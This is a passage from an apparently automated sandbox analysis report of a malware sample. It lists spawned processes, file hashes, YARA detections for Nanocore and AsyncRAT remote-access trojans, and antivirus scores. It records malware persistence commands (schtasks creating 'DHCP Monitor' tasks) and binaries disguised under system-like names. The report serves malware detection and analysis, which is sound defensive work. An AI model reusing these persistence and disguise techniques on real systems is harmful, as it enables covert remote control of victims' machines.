                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:7
                                                  Start time:02:39:56
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\SYSTEM32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SYSTEM32.EXE"
                                                  Imagebase:0xda0000
                                                  File size:48640 bytes
                                                  MD5 hash:807474FC253612359DC697E331F01B43
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\SYSTEM32.EXE, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:8
                                                  Start time:02:39:56
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                  Imagebase:0xbc0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 49%, Metadefender, Browse
                                                  • Detection: 81%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:9
                                                  Start time:02:39:57
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\WINDOWS.EXE"
                                                  Imagebase:0x400000
                                                  File size:979968 bytes
                                                  MD5 hash:6278F321B0B9C85A0DF4E485A8DE7993
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:11
                                                  Start time:02:39:59
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\._cache_WINDOWS.EXE"
                                                  Imagebase:0x5b0000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 88%, Metadefender
                                                  • Detection: 98%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:12
                                                  Start time:02:40:00
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                  Imagebase:0x5c0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:13
                                                  Start time:02:40:04
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
                                                  Imagebase:0xb70000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:14
                                                  Start time:02:40:05
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7f20f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:15
                                                  Start time:02:40:05
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                  Imagebase:0xe80000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:low

                                                  Target ID:16
                                                  Start time:02:40:06
                                                  Start date:26/01/2022
                                                  Path:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\._cache_WINDOWS.EXE 0
                                                  Imagebase:0xd70000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation:low

                                                  Target ID:17
                                                  Start time:02:40:07
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
                                                  Imagebase:0xb70000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:18
                                                  Start time:02:40:08
                                                  Start date:26/01/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7f20f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:19
                                                  Start time:02:40:09
                                                  Start date:26/01/2022
                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                                                  Imagebase:0xe20000
                                                  File size:208384 bytes
                                                  MD5 hash:568E6A074378730CEE0947C4C796372D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 88%, Metadefender
                                                  • Detection: 98%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:20
                                                  Start time:02:40:15
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0x870000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.379982346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.378011350.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.429244511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
